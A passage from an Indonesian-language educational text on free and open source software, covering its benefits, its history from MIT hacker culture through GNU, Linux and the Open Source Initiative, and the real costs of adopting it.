  3. Kendali mutu yang lebih baik: Semakin banyak orang menggunakan dan mengevaluasi kode sumber, maka kesalahan yang ada akan mudah ditemukan dan diperbaiki secara cepat. Aplikasi proprietary bisa saja menerima laporan kesalahan, tetapi karena pengguna tidak dapat akses ke kode sumber, maka pengguna hanya bisa sebatas melaporkan. Pengembang FOSS sering menemukan bahwa pengguna yang memiliki akses ke kode sumber tidak hanya bisa melaporkan kesalahan, namun juga menjelaskan lebih tajam apa penyebabnya, dan dalam beberapa kasus pengguna dapat mengirimkan kode perbaikannya. Ini sangat mengurangi waktu pengembangan dan kontrol terhadap kualitas.
  4. Mengurangi biaya perawatan: Biaya perawatan software sering sama atau lebih besar dari biaya pengembangan awal. Jika sebuah perusahaan merawat software sendirian, maka pekerjaan itu menjadi sangat mahal. Dengan menggunakan model pengembangan FOSS, biaya perawatan dapat dibagi di antara ribuan pengguna potensial, sehingga mengurangi biaya perawatan per orang atau organisasi. Demikian pula peningkatan kemampuan software dapat dilakukan oleh banyak organisasi atau individu, yang hasilnya akan lebih efisien dalam menggunakan sumber daya.
IV. SEJARAH FOSS
Gerakan FOSS dimulai dalam budaya “hacker” yang terjadi pada beberapa laboratorium ilmu komputer (Stanford, Berkeley, Carnegie Melion, dan MIT) di ahun 1960an dan 1970an. Komunitas pemrogram adalah kecil dan saling terkait secara dekat. Kode program disebarluaskan di antara anggota komunitas. Jika Anda membuat perbaikan, Anda diharapkan untuk mengirim kode Anda ke komunitas pengembang.
4.1. Sejarah Singkat Gerakan FOSS
Gerakan FOSS boleh dikatakan dimulai sejak awal mula industri komputer, meskipun tidak dinyatakan secara formal atau dengan konsep yang jelas. Hanya saja pada akhir 1970an dan awal 1980an
terjadi konflik antara konsep saling berbagi perangkat lunak dengan konsep perangkat lunak berpemilik (proprietary). Acuan awal konflik ini dibuat oleh William H. Gates III (Bill Gates), dalam pernyataannya yang terkenal “An Open Letter to Hobbyists” (Surat Terbuka kepada para Hobby). Dalam surat tertanggal 3 Februari 1976 itu ia mencemooh budaya berbagi perangkat lunak yang telah umum berlaku: Mengapa ini? Hobbyists harus hati-hati, sebagian besar Anda mencuri perangkat lunak Anda. Perangkat keras harus dibeli, tetapi perangkat lunak menjadi sesuatu untuk dibagi. Siapa yang mau peduli jika orang yang bekerja untuk itu mengambil bayaran? Perangkat lunak proprietary ingin mengambil kesempatan pada tahun-tahun berikutnya. Di laboratorium kecerdasan buatan (Artificial Intelligence) MIT pada awal 1980an, sebuah perusahaan bernama Symbolics didirikan, lalu mengambil kode-kode yang tersedia secara bebas (bahasa pemrograman LISP) dan menjadikannya proprietary (tidak tersedia bebas alias berpemilik). Dalam prosesnya, ini berarti menghapus budaya berbagi perangkat lunak di laboratorium MIT saat itu. Namun, perusakan ini akhirnya akan menghasilkan
kreasi FSF dan budaya FOSS saat ini. Richard Stallman, salah satu anggota laboratorium MIT saat itu, terkejut atas lanjutan persitiwa tersebut. Ini kemudian membentuk pandangannya terhadapat perangkat lunak proprietary, dan membangkitakan keinginannya untuk membuat sistem operasi yang free (bebas). Projek GNU (GNU is Not UNIX) berdiri pada Januari 1984. Dalam dekade berikutnya projek GNU menghasilkan berbagai program atau tool penting merupakan bagian dari sistem operasi. Yayasan perangkat lunak bebas (FSF) didirikan setahun kemudian untuk mempromosikan perangkat lunak dan projek GNU. Namun, hingga 1991 projek GNU belum menghasilkan sistem operasi lengkap karena masih ada kekurangan pada bagian kritis, yaitu kernel. Kernel merupakan inti atau jantung dari sistem operasi. Linus Torvalds yang saat itu mahasiswa tahun kedua Universitas Helsinki membuat dan mendistribusikan kernel seperti UNIX. Sejalan dengan tujuan pengembangan FOSS, kernel yang
kemudian diberi nama Linux itu tersebar secara luas, dikembangkan, dan diaplikasikan menjadi inti dari sistem operasi GNU/Linux. Ada beberapa projek FOSS yang sedang berjalan dalam waktu bersamaan, antara lain server DNS BIND, bahasa pemrograman Perl, dan sistem operasi BSD. Sebagian besar projek itu kemudian bergabung atau saling menguatkan. Sistem operasi GNU/Linux terus tumbuh secara cepat dengan makin lengkap fitur dan kemampuannya. Pada 1997, Linux meledak menjadi berita media, sesuai dengan perkiraan IDC (International Data Corporartion) bahwa Linux telah menguasai 25% sistem operasi server dan memiliki pertumbuhan 25% per
tahun.
Pada 1998, sebagai tanggapan terhadap Netscape yang merilis kode sumber program Netscape Navigator sebagai FOSS, sekelompok pengembang FOSS bergerak bersama dan label “Open Source” digulirkan. Gerakan ini lalu
membentuk OSI (Open Source Initiative) dan OSD (Open Source Definition). Tujuan utama gerakan ini untuk mengajak dunia bisnis memberi penekanan kepada proses pengembangan FOSS, dan mengalihkan perhatian dari gerakan perangkat lunak bebas (Free Software) yang kontroversial saat itu.
Pada 1999, perusahaan distributor GNU/Linux Red Hat berhasil go public atau IPO (Initial Public Offering) dengan meraup dana dari pasar saham senilai US$ 4,8 milyar (sekitar Rp 43 trilyun jika 1US$ = Rp 9.000,). Sukses lain IPO perusahaan FOSS saat itu adalah VA Linux (US$ 7 milyar atau Rp 63 trilyun), Cobalt Networks (US$ 3,1 milyar atau Rp 28 trilyun), dan Andover.net (US$ 712 juta atau Rp 6,4 trilyun). Sebagai anak baru dari FOSS, kesuksesan GNU/Linux menunjukkan bahwa era FOSS telah benar-benar tiba.

V. MENGAPA FOSS?
Perangkat lunak open source telah disebut dengan beberapa istilah baik dan buruk, antara lain: gerakan, mode, virus, konspirasi komunis, hati dan jiwa dari internet. Tetapi ada satu poin yang sering dilupakan orang bahwa perangkat lunak open source juga merupakan kendaraan yang sangat efektif untuk mentransfer kekayaan dari dunia industri ke negaranegara berkembang. Itu diungkapkan Andrew Leonard dalam tulisannya “An Alternative Voice: How the TechPoor Can Still Be Software Rich” (bagaimana yang miskin teknologi dapat tetap menjadi kaya
perangkat lunak).
Apakah FOSS selalu Free?
Mitos terkenal di seputar FOSS adalah selalu gratis, yang artinya tidak ada biaya sama sekali. Ini benar hanya untuk tingkatan tertentu, misalnya tidak perlu biaya izin untuk mendownload atau menggandakan, misalnya iso CD IGOS Nusantara atau Fedora. Mitos itu tidak benar untuk aplikasi FOSS yang membutuhkan biaya
dalam pengemasan, instalasi, support, pelatihan, dan lain-lain. Banyak distro Linux seperti Red Hat, SUSE, Mandriva, Debian, Ubuntu, dan lain-lain dapat diperoleh tanpa biaya lisensi untuk mendownloadnya
melalui internet. Dalam hal ada biaya lisensi, hampir semua biaya lisensi aplikasi FOSS lebih murah
dibandingkan lisensi perangkat lunak proprietary. Namun, biaya penggunaan FOSS tidak hanya biaya pemaketan atau infrastruktur. Ada juga biaya personal, biaya perangkat keras, biaya yang hilang (opportunity costs) misalnya karena peralihan, dan biaya pelatihan. Dengan menghitung biaya total kepemilikan atau TCO (Total Costs of Ownership), akan tergambar penghematan yang diperoleh jika menggunakan FOSS.